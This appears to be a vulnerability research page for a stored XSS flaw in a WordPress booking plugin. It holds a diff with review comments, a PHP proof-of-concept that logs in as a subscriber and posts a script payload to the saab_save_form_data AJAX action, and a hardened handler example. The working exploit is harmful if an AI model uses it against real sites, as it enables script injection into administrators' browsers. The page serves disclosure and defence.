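Review bot: saab_send_notification() takes `$status` as a parameter but then silently replaces it with `$_POST['status']` whenever that field is present, so a caller passing an explicit status receives different behaviour than it asked for. Either have callers resolve the status from POST and pass it in, or document the override in the docblock. The `print_r( $get_notification_array, true )` line also writes the whole notification configuration (addresses, templates) to the error log; it is behind WP_DEBUG, but logging only keys and counts would be enough to debug the lookup.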
@@ -1142,9 +1155,10 @@
 					if ($notification['state'] === 'enabled' && $notification['type'] === $status) {
 						$notificationFound = true; // Mark notification as found

-						// Log notification for debugging
-						if (defined('WP_DEBUG') && WP_DEBUG) {
-							error_log('Notification found: ' . print_r($notification, true));
+						// Log notification for debugging.
+						if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+							// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+							error_log( 'Notification found: ' . print_r( $notification, true ) );
 						}

 						$check_to = $notification['to'];
@@ -1166,11 +1180,12 @@
 						$cc = $this->saab_check_shortcode_exist($check_cc, $form_id, $form_data, $shortcodesArray);
 						$check_body = $this->saab_check_shortcodes_exist_in_editor($check_body, $form_id, $form_data, $shortcodesArray);

-						// Log email details for debugging
-						if (defined('WP_DEBUG') && WP_DEBUG) {
-							error_log('Email details: to: ' . $to . ', from: ' . $from . ', subject: ' . $subject . ', body: ' . $check_body);
+						// Log email details for debugging.
+						if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+							// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+							error_log( 'Email details: to: ' . $to . ', from: ' . $from . ', subject: ' . $subject . ', body: ' . $check_body );
 						}
-
+
 						// Set email headers
 						$headers = array(
 							'From: ' . sanitize_email($from),
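Review bot: the debug line logs the full rendered email (`to`, `from`, `subject` and the complete `body`) to the PHP error log; the body contains the booker's submitted data, so even under WP_DEBUG this writes personal data to a file that is often readable by other tenants on shared hosting. Log the notification type and recipient count instead of the body.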
@@ -1192,27 +1207,34 @@
 						if ($result) {
 							$message = esc_html__('Email sent successfully', 'smart-appointment-booking');
 						} else {
-							$message = esc_html__('Failed to send email', 'smart-appointment-booking');
-							if (defined('WP_DEBUG') && WP_DEBUG) {
-								error_log('Failed to send email to: ' . $to); // Debug logging
+							$message = esc_html__( 'Failed to send email', 'smart-appointment-booking' );
+							if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+								// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+								error_log( 'Failed to send email to: ' . $to );
 							}
 						}
 					}
 				}
 			} else {
-				// Log an error if no notification data was found for the form
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('No notification data found for form ID: ' . $form_id);
+				// Log an error if no notification data was found for the form.
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'No notification data found for form ID: ' . $form_id );
 				}
 			}
-
-			// If no notification was found, log an error
-			if ($notificationFound === false) {
-				$message = __('Notification not found for the given status: ' . $status, 'smart-appointment-booking');
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('Notification not found for the given status: ' . $status); // Debug logging
+
+			// If no notification was found, log an error.
+			if ( $notificationFound === false ) {
+				$message = sprintf(
+					/* translators: %s: notification status (e.g. booked, approved, cancelled) */
+					__( 'Notification not found for the given status: %s', 'smart-appointment-booking' ),
+					$status
+				);
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'Notification not found for the given status: ' . $status );
 				}
-				wp_send_json_error(array('message' => $message));
+				wp_send_json_error( array( 'message' => $message ) );
 				wp_die();
 			}

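Review bot: the docblock above says `@return string`, but the not-found branch now calls wp_send_json_error() followed by wp_die(), terminating the request from inside a helper; any caller that expected a string back and meant to continue never runs. Return the message here and let the AJAX handler decide whether to emit JSON, as saab_send_post_update_notification() below does.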
@@ -1224,8 +1246,9 @@


 		function saab_send_post_update_notification($status, $form_id, $post_id, $form_data) {
-			// Sanitize status and other input data
-			$status = (isset($_POST['status']) && !empty($_POST['status'])) ? sanitize_text_field($_POST['status']) : sanitize_text_field($status);
+			// Status may be overridden from POST; nonce verified in calling AJAX handler.
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$status = ( isset( $_POST['status'] ) && ! empty( $_POST['status'] ) ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : sanitize_text_field( $status );
 			$message = '';

 			// Get notification data from post meta
@@ -1283,9 +1306,20 @@
 							$message = __('Email sent successfully', 'smart-appointment-booking');
 						} else {
 							// Log details if email sending fails
-							$message = __('Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . json_encode($headers), 'smart-appointment-booking');
-							if (defined('WP_DEBUG') && WP_DEBUG) {
-								error_log('Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . json_encode($headers));
+							$message = sprintf(
+								/* translators: 1: to address, 2: from address, 3: Bcc, 4: Cc, 5: subject, 6: body, 7: headers */
+								__( 'Failed to send email. Details: to-%1$s, from-%2$s, Bcc-%3$s, Cc-%4$s, subject-%5$s, body-%6$s, headers-%7$s', 'smart-appointment-booking' ),
+								$to,
+								$from,
+								$bcc,
+								$cc,
+								$subject,
+								$check_body,
+								wp_json_encode( $headers )
+							);
+							if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+								// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+								error_log( 'Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . wp_json_encode( $headers ) );
 							}
 						}
 					}
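Review bot: the `$message` built on failure embeds `$to`, `$from`, `$bcc`, `$cc`, the subject, the full body and the JSON-encoded headers, and this function returns `$message` to its caller, so unless every caller discards it the Bcc recipients and header contents are disclosed to whoever triggered the notification. Keep the detailed string in the WP_DEBUG error_log() branch only and return the generic "Failed to send email" text that saab_send_notification() uses.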
@@ -1293,16 +1327,21 @@
 			}

 			// Handle case where no matching notification is found
-			if ($notificationFound === false) {
-				$message = __('Notification not found for the given status: ' . $status, 'smart-appointment-booking');
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('Notification not found for the given status: ' . $status);
+			if ( $notificationFound === false ) {
+				$message = sprintf(
+					/* translators: %s: notification status (e.g. booked, approved, cancelled) */
+					__( 'Notification not found for the given status: %s', 'smart-appointment-booking' ),
+					$status
+				);
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'Notification not found for the given status: ' . $status );
 				}
 			}
-
+
 			return $message;
 		}
-
+
 		/**
 		 * Process the given field value containing shortcodes and replace them with actual values.
 		 *
@@ -2112,8 +2151,8 @@
 							<?php
 							$timezone = get_post_meta($post_id,'saab_timezone',true);
 							$error = false;
-							$TodaysDate = date('F d, Y');
-							$todaysDate = date('Y-m-d');
+							$TodaysDate = gmdate( 'F d, Y' );
+							$todaysDate = gmdate( 'Y-m-d' );
 							echo "<h3 id='head_avail_time'><span class='gfb-timezone'>Timezone: " . esc_attr($timezone) .
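Review bot: swapping date() for gmdate() silences the sniff but changes what "today" means: gmdate() always uses UTC, while this view reads a per-form `saab_timezone` two lines earlier, so around midnight the highlighted day can be off by one for the booker. Use wp_date( 'Y-m-d', null, new DateTimeZone( $timezone ) ) so the date follows the configured timezone.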

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0742 - Smart Appointment & Booking <= 1.0.7 - Authenticated (Subscriber+) Stored Cross-Site Scripting via saab_save_form_data AJAX Action

/**
 * Proof of Concept for CVE-2026-0742
 * Requires valid WordPress subscriber credentials
 * Targets the saab_save_form_data AJAX endpoint
 */

$target_url = 'https://vulnerable-site.com';
$username   = 'subscriber_user';
$password   = 'subscriber_pass';
$entry_id   = '123';        // Target form entry ID (must be an existing entry)
$field_name = 'field_name'; // Replace with the actual form field key used in updated_data[]

// Cookie jar for the session; the same file is read back so the login cookies
// are sent on the later AJAX request.
$cookie_jar = tempnam(sys_get_temp_dir(), 'poc_cookies_');

// Initialize one cURL handle and reuse it for every request
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);

// Step 1: GET the login page so WordPress sets its test cookie in the jar.
// wp-login.php carries no nonce, so there is nothing to extract from the HTML.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_HTTPGET, true);
if (curl_exec($ch) === false) {
    unlink($cookie_jar);
    die('Request failed: ' . curl_error($ch) . "\n");
}

// Step 2: Submit login credentials
$post_fields = [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 3: Verify login success by checking for the admin bar on the landing page
if ($login_response === false || strpos($login_response, 'wp-admin-bar') === false) {
    unlink($cookie_jar);
    die("Login failed. Check credentials.\n");
}

// Step 4: Send the stored XSS payload to the vulnerable AJAX action
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload  = '<script>alert("XSS via CVE-2026-0742");</script>';

$exploit_data = [
    'action'   => 'saab_save_form_data',
    'entry_id' => $entry_id,
    'updated_data[' . $field_name . ']' => $payload,
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$ajax_response = curl_exec($ch);

// Step 5: Check for successful injection. A JSON body is inspected for
// "success": true; a bare substring check would also match {"success":false}.
$decoded = json_decode((string) $ajax_response, true);
if (is_array($decoded) && array_key_exists('success', $decoded)) {
    $injected = ($decoded['success'] === true);
} else {
    $injected = ($ajax_response !== false && strpos($ajax_response, 'success') !== false);
}

if ($injected) {
    echo "Payload injected successfully.\n";
    echo "Visit {$target_url}/wp-admin/edit.php?post_type=manage_entries to trigger execution.\n";
} else {
    echo "Injection failed. Response: " . htmlspecialchars((string) $ajax_response) . "\n";
}

curl_close($ch);
unlink($cookie_jar);
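For contrast with the PoC above, the following is an added example of how an AJAX handler of this kind is hardened so that the request the PoC sends is rejected and, even if a value were stored, it could not execute when viewed. It is illustrative code written for this page, not the plugin's own code and not a description of what version 1.0.8 changed: the nonce action name `saab_form_nonce`, the `saab_entry_data` meta key, the `manage_options` capability and the helper function names are assumptions; the `manage_entries` post type and the `entry_id` / `updated_data[]` parameters are taken from the PoC.

```php
<?php
/*
 * Illustrative hardened handler for a "save form entry data" AJAX action.
 * Every name marked (assumed) is invented for this example; the remediation
 * pattern itself (nonce, capability check, sanitise on input, escape on
 * output) is the standard WordPress approach to stored XSS.
 */

add_action( 'wp_ajax_saab_save_form_data', 'saab_hardened_save_form_data' );

function saab_hardened_save_form_data() {
    // 1. CSRF: the request must carry a nonce issued to this user for this action.
    //    'saab_form_nonce' is an assumed nonce action name; 'nonce' is the POST field.
    check_ajax_referer( 'saab_form_nonce', 'nonce' );

    // 2. Authorisation: editing stored entries is an admin operation. A Subscriber
    //    only has 'read', so this check alone closes the Subscriber+ attack path.
    //    'manage_options' is assumed; use whatever capability the plugin's admin
    //    menu is registered with.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input validation: the entry must exist and be the expected post type.
    $entry_id = isset( $_POST['entry_id'] ) ? absint( wp_unslash( $_POST['entry_id'] ) ) : 0;
    if ( ! $entry_id || 'manage_entries' !== get_post_type( $entry_id ) ) {
        wp_send_json_error( array( 'message' => 'Unknown entry.' ), 400 );
    }

    // 4. Input sanitisation: every submitted value is reduced to plain text and
    //    every key is normalised, so markup cannot arrive via the field name either.
    $raw   = ( isset( $_POST['updated_data'] ) && is_array( $_POST['updated_data'] ) )
        ? wp_unslash( $_POST['updated_data'] )
        : array();
    $clean = saab_sanitize_entry_fields( $raw );

    // 5. Store only the sanitised array. 'saab_entry_data' is an assumed meta key.
    update_post_meta( $entry_id, 'saab_entry_data', $clean );

    wp_send_json_success( array( 'updated' => count( $clean ) ) );
}

/**
 * Reduce an array of submitted field values to sanitised key => string pairs.
 * Nested arrays are dropped rather than flattened, which keeps the stored
 * shape predictable for the renderer below.
 */
function saab_sanitize_entry_fields( array $fields ) {
    $clean = array();
    foreach ( $fields as $key => $value ) {
        if ( is_array( $value ) ) {
            continue;
        }
        $clean_key = sanitize_key( (string) $key );   // lowercase [a-z0-9_-] only
        if ( '' === $clean_key ) {
            continue;
        }
        $clean[ $clean_key ] = sanitize_text_field( (string) $value ); // strips tags and control bytes
    }
    return $clean;
}

/**
 * Output side: even sanitised data is escaped at the point it is printed, so a
 * value that slipped past input filtering, or was stored by an older version,
 * is rendered as text rather than executed when an administrator views it.
 */
function saab_render_entry_fields( array $fields ) {
    $html = '<table class="saab-entry">';
    foreach ( $fields as $key => $value ) {
        $html .= '<tr><th>' . esc_html( $key ) . '</th><td>' . esc_html( $value ) . '</td></tr>';
    }
    return $html . '</table>';
}
```

The two layers are deliberately independent: the capability check is what turns the Subscriber request in the PoC into a 403, while `esc_html()` in the renderer is what stops a `<script>` value from running even if some other write path puts one into post meta. Fixing only the input side leaves previously stored payloads live, so a site that upgrades after exposure should also review existing entries.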
